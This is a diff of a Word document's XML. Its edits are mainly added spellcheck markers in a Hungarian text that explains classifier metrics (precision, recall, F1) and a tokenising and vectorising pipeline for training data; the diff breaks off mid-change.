-        </w:rPr>
-        <w:t xml:space="preserve">true positive, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13854,11 +15437,33 @@
         </w:rPr>
         <w:t>igaz negatív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">true negative, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13917,11 +15522,33 @@
         </w:rPr>
         <w:t>hamis pozitív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">false positive, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13980,11 +15607,33 @@
         </w:rPr>
         <w:t>hamis negatív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">false negative, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14048,6 +15697,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -14056,6 +15706,7 @@
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14079,12 +15730,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14101,7 +15754,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(true positive) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14143,7 +15824,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (total predicted positive)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>total</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>predicted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14200,12 +15923,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14313,6 +16038,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -14321,6 +16047,7 @@
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14344,12 +16071,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14378,14 +16107,42 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (true positive)</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14420,19 +16177,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(total </w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>total</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>actual</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> positive)</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14500,12 +16287,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14643,8 +16432,18 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>F-1 score</w:t>
-      </w:r>
+        <w:t xml:space="preserve">F-1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>score</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14668,6 +16467,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Az F1 pontszám a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14678,7 +16478,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">recision </w:t>
+        <w:t>recision</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14692,6 +16499,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14702,7 +16510,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ecall </w:t>
+        <w:t>ecall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14770,24 +16585,28 @@
         </w:rPr>
         <w:t xml:space="preserve">Ennek eredményeként az osztályozó csak akkor kap magas F-1 pontszámot, ha mind a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">, mind a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14985,12 +16804,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15116,7 +16937,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a tanulo_adatok mappában</w:t>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappában</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15292,11 +17127,19 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>txt kiterjesztéssel.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztéssel.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15492,7 +17335,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> .txt kiterjesztésű fájljait</w:t>
+        <w:t xml:space="preserve"> .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztésű fájljait</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15558,7 +17415,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („kind”, „name”, „raw”)</w:t>
+        <w:t xml:space="preserve"> („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>raw</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15624,7 +17523,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>azonos nevű .csv kiterjesztésű fájlok</w:t>
+        <w:t>azonos nevű .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztésű fájlok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15708,7 +17621,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>– továbbiakban toke</w:t>
+        <w:t xml:space="preserve">– továbbiakban </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>toke</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15716,6 +17636,7 @@
         </w:rPr>
         <w:t>nekben</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15887,7 +17808,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> következő lépésben a .csv fájlokat </w:t>
+        <w:t xml:space="preserve"> következő lépésben a .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokat </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15931,11 +17866,19 @@
         </w:rPr>
         <w:t xml:space="preserve">egy </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv fájlb</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15947,7 +17890,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> concatenated néven</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> néven</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16129,12 +18086,14 @@
         </w:rPr>
         <w:t xml:space="preserve">későbbiekben az egyes </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>tokenek</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16153,11 +18112,19 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv viszonylatában</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viszonylatában</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16297,12 +18264,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> olyan </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>numpy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16386,7 +18355,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>__init__</w:t>
+        <w:t>__</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>__</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16400,6 +18383,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16408,6 +18392,7 @@
         </w:rPr>
         <w:t>Vectorizer</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16450,6 +18435,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16458,6 +18444,7 @@
         </w:rPr>
         <w:t>filename</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16480,7 +18467,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>zoknak a tokeneknek a maximális szám</w:t>
+        <w:t xml:space="preserve">zoknak a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tokeneknek</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a maximális szám</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16506,6 +18507,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16514,6 +18516,7 @@
         </w:rPr>
         <w:t>max_vocab</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16562,12 +18565,14 @@
         </w:rPr>
         <w:t xml:space="preserve">hány </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>token</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16586,6 +18591,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16594,6 +18600,7 @@
         </w:rPr>
         <w:t>max_length</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16656,6 +18663,7 @@
         </w:rPr>
         <w:t>va van egy számláló (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16664,6 +18672,7 @@
         </w:rPr>
         <w:t>word_freqs</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16718,6 +18727,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16726,6 +18736,7 @@
         </w:rPr>
         <w:t>dataset</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16761,11 +18772,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">collectVocab: </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>collectVocab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16791,100 +18810,136 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.oszlopának </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>sorait</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, szóköz alapján szétválasztja </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a token</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>sorozato</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az egyes tokeneket az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>előfordulási szám</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
